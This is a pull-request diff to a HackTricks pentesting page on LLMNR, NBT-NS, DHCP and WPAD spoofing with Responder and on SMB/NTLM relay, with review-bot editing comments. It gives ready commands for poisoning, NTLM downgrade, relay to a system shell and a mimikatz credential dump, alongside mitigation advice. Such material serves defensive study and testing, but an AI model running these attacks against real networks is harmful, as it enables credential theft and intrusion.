Merge pull request HackTricks-wiki#306 from clem9669/responder-dhcp
Responder dhcp
carlospolop authored Mar 18, 2022
2 parents a1d87aa + d117060 commit 3c47e07
Showing 1 changed file with 84 additions and 26 deletions.
@@ -1,4 +1,4 @@
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
# Spoofing LLMNR, NBT-NS, mDNS/DNS, DHCP and WPAD and Relay Attacks

## Network protocols
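Review bot: the title now advertises DHCP, but the hunk leaves the `## Network protocols` overview directly beneath it untouched, so the intro still lists only LLMNR, NBT-NS, mDNS/DNS and WPAD. A one-line entry there naming which DHCP options are abused (the new DHCP section below mentions NetBIOS, WINS and WPAD settings) would keep the overview in step with the title.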

@@ -21,25 +21,72 @@ Responder automates the WPAD attack—running a proxy and directing clients to a

## Responder

> Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to _specific_ NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)). By default, the tool will only answer to File Server Service request, which is for SMB.
> Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)). By default, the tool will only answer to File Server Service request, which is for SMB.
>
> The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.
[**Responder**](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in _/etc/responder/Responder.conf_\
__You can find here **Responder for windows** here: [https://github.com/lgandx/Responder-Windows](https://github.com/lgandx/Responder-Windows)__\
__To run default Responder behaviour you only have to execute:
[Responder](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in _/etc/responder/Responder.conf_

You can find here Responder for **windows** [here](https://github.com/lgandx/Responder-Windows)

> Responder works in ipv4 & **ipv6**

Options are the following :

```text
--version show program's version number and exit
-h, --help show this help message and exit
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
BROWSER, LLMNR requests without responding.
-I eth0, --interface=eth0
Network interface to use, you can use 'ALL' as a
wildcard for all interfaces
-i 10.0.0.21, --ip=10.0.0.21
Local IP to use (only for OSX)
-6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
Poison all requests with another IPv6 address than
Responder's one.
-e 10.0.0.22, --externalip=10.0.0.22
Poison all requests with another IP address than
Responder's one.
-b, --basic Return a Basic HTTP authentication. Default: NTLM
-d, --DHCP Enable answers for DHCP broadcast requests. This
option will inject a WPAD server in the DHCP response.
Default: False
-D, --DHCP-DNS This option will inject a DNS server in the DHCP
response, otherwise a WPAD server will be added.
Default: False
-w, --wpad Start the WPAD rogue proxy server. Default value is
False
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
Upstream HTTP proxy used by the rogue WPAD Proxy for
outgoing requests (format: host:port)
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
retrieval. This may cause a login prompt. Default:
False
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
authentication for the proxy. WPAD doesn't need to be
ON. This option is highly effective when combined with
-r. Default: False
--lm Force LM hashing downgrade for Windows XP/2003 and
earlier. Default: False
--disable-ess Force ESS downgrade. Default: False
-v, --verbose Increase verbosity.
```

To run default Responder behaviour you only have to execute:

```bash
responder -I <Iface>
responder -I <Iface> -Pv
```

![](<../../.gitbook/assets/image (172).png>)

An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked** [**following this guide**](../../windows/ntlm/#ntlmv1-attack)**.**

```bash
#Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
responder -I <Iface> --lm #Downgrade NTLM authntication if possible
responder -I <Iface> --lm --disable-ess #Downgrade NTLM authntication if possible and force ESS downgrade
```

By **default**, the **WPAD impersonation won't be executed**, but you can execute it doing:
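Review bot: the "To run default Responder behaviour" example now reads `responder -I <Iface> -Pv`, but according to the option list added in this same hunk `-P, --ProxyAuth` forces NTLM/Basic authentication for the proxy and defaults to False, so it is not default behaviour. Either keep the bare `responder -I <Iface>` as the default and present `-Pv` on its own with a sentence saying what `-P` does, or reword the lead-in. Smaller points in the same hunk: "You can find here Responder for **windows** [here]" doubles "here"; the quoted README line still reads "Responder an LLMNR, NBT-NS and MDNS poisoner" (missing "is"); and the `--lm` examples in the context lines spell "authntication".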
@@ -48,12 +95,6 @@ By **default**, the **WPAD impersonation won't be executed**, but you can execut
responder -I <Iface> --wpad
```

Responder can also send **fake DNS responses** (so the IP of the attacker is resolved) and can inject **PAC files** so the victim will get the IP of the **attacker as a proxy**.

```bash
responder.py -I <interface> -w On #If the computer detects the LAN configuration automatically, this will impersonate it
```

You can also **resolve NetBIOS** requests with **your IP**. And create an **authentication proxy**:

```bash
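Review bot: this deletion removes the only sentence stating that Responder's fake DNS answers and injected PAC file make the victim use the attacker as its proxy, so the `responder -I <Iface> --wpad` line just above is now left with no description of what the rogue WPAD actually serves. Consider folding one sentence of the removed paragraph into the `--wpad` lead-in; dropping the old `-w On` form itself is fine, since `-w, --wpad` is the flag shown in the option list.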
@@ -64,13 +105,30 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s

The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`

### Capturing credentials
## DHCP Poisoning

Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.

Spoofing DHCP responses with no disruption can be challenging since you're interfering with a workstation network configuration. Usually, you need to have very good knowledge of the target subnet, where is the DNS server, where is the switch, routing table, domain, netmask, DHCP server, etc. **Any mistake with these settings will result in disruption on the network.**

However, spoofing DHCP answers has unique benefits. **It's definitely stealthier than ARP poisoning**; One unicast response is sufficient to permanently poison a victim's routing information, it's also common to see multiple DHCP servers operating on a network. Unicast DHCP answers are more complex to detect, a few switch provides security settings to prevent DHCP snooping, however those settings are not straightforward and are often misconfigured when enabled.

> This attack is highly effective and gives you assured NTLMv1/2 hashes.
```bash
./Responder.py -I eth0 -rPdv
```


## Capturing credentials

Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):

It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.

![](<../../.gitbook/assets/poison (1) (1).jpg>)

## **Inveigh**
## Inveigh

> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
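Review bot: `./Responder.py -I eth0 -rPdv` is given with no explanation of its flags; from the option list above, `-d` is the DHCP answer switch, `-r` answers Workstation Service name suffixes and `-P` forces proxy authentication, so a line such as "`-d` enables the DHCP answers; `-D` injects a DNS server instead of a WPAD server" would tell the reader which flag this section is actually about. "One unicast response is sufficient to permanently poison a victim's routing information" also overstates it: a DHCP lease has a finite lifetime, so the poisoned settings persist only as long as the rogue server keeps answering renewals. Since the paragraph itself notes that DHCP snooping on switches prevents this, the `## Solution` section at the end should gain a DHCP snooping / trusted-port item next to the LLMNR, NetBIOS and WPAD mitigations. Formatting: the quote line `> This attack is highly effective...` runs straight into the code fence without a blank line, the two blank lines after the fence can be one, and "a few switch provides" / "where is the DNS server" need grammar fixes.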
@@ -80,17 +138,18 @@ Responder is going to **impersonate all the service using the mentioned protocol

## Relay Attack

**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)****
**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)

This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.
Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.

The 3 main **tools** to perform this attack are: **smb\_relay** (metasploit), **MultyRelay** (responder), and **smbrealyx** (impacket).

Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in ** **_**/usr/share/responder/Responder.conf**_ and then execute responder on the desired **interface**: `responder -I eth0 -rv`
Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in **/usr/share/responder/Responder.conf** and then execute responder on the desired **interface**: `responder -I eth0 -rv`

You can perform this attack using **metasploit module**: `exploit/windows/smb/smb_relay`

You can perform this attack using **metasploit module**: `exploit/windows/smb/smb_relay`\
The option `SRVHOST` is used to point the server **were you want to get access**.\
The option `SRVHOST` is used to point the server **were you want to get access**.
Then, when **any host try to authenticate against you**, metasploit will **try to authenticate against the other** server.

You **can't authenticate against the same host that is trying to authenticate against you** (MS08-068). **Metasploit** will **always** send a "_**Denied**_" **response** to the **client** that is trying to connect to you.
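Review bot: the reworked line still says "the server **were you want to get access**" ("where"), and the tool names in the context lines have typos: "MultyRelay" should be "MultiRelay" (the command in the next hunk is `MultiRelay.py`) and "smbrealyx" should be "smbrelayx". Separately, the rendered diff shows "You can perform this attack using **metasploit module**" twice; make sure only one copy survives in the new file, since the backslash hard-breaks that tied those lines together were removed.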
@@ -114,8 +173,6 @@ python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
**At this point you can shut off Responder; we don’t need it anymore.**\
**With the shell access we have obtained, there are many actions that we can perform directly from here:**

![Step 41 | Intrinium.com](https://intrinium.com/wp-content/uploads/step41.png)

**Mimikatz** commands can also be performed directly **from the shell**. Unfortunately, the target used for this tutorial’s antivirus ate my mimikatz, but the following commands can be executed to run mimikatz, as well as the entire pallette of modules.: **`Mimi sekurlsa::logonpasswords`**

## InveighZero
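Review bot: dropping the intrinium-hosted screenshot is reasonable (an external image rather than one under `.gitbook/assets`), but the sentence left behind should be cleaned up in the same change: "pallette" is "palette", "modules.:" has a stray period, and "the target used for this tutorial's antivirus ate my mimikatz" is first-person text copied from the source tutorial that reads oddly in a wiki; something like "AV on the target may block mimikatz" keeps the meaning.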
@@ -133,7 +190,7 @@ In Windows you **may be able to force some privileged accounts to authenticate t

## Solution

### **Disabling LLMNR**
### Disabling LLMNR

To disable LLMNR in your domain for DNS clients, open gpedit.msc.\
Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\
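Review bot: the heading change matches the other headings in this diff. On the unchanged context: the paragraph says "disable LLMNR in your domain" but opens `gpedit.msc`, which edits only the local computer's policy; for a domain-wide setting the GPO has to be edited through the Group Policy Management console (`gpmc.msc`), and the path "Computer Configuration -> Administrative Templates -> Network -> DNS client" is the same there.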
@@ -161,7 +218,7 @@ Select the option “001 Microsoft Disable Netbios Option” from the list and c

![](../../.gitbook/assets/5.jpg)

### **WPAD**
### WPAD

To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS zone. Note that the DNS entry does not need to point to a valid WPAD server. As long as the queries are resolved, the attack will be prevented.
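Review bot: the heading change is fine; on the unchanged mitigation text: a "wpad" DNS record only defeats WPAD discovery through name resolution, while the option list earlier in this diff shows `-d` injecting a WPAD server directly into DHCP replies, so this section should also say that the DHCP path needs DHCP snooping on the switch (as the new DHCP section mentions) or clients configured not to automatically detect proxy settings.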

@@ -181,7 +238,8 @@ To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS

## References

**Images from:** [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
**Images from:**
[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
[https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)\
[https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)\
[https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
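Review bot: splitting "Images from:" onto its own line has no effect when rendered: that line now ends without the `\` hard-break the other lines use, so markdown joins it with the first URL again. Either restore the trailing `\` on the "Images from:" line or leave a blank line after it.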
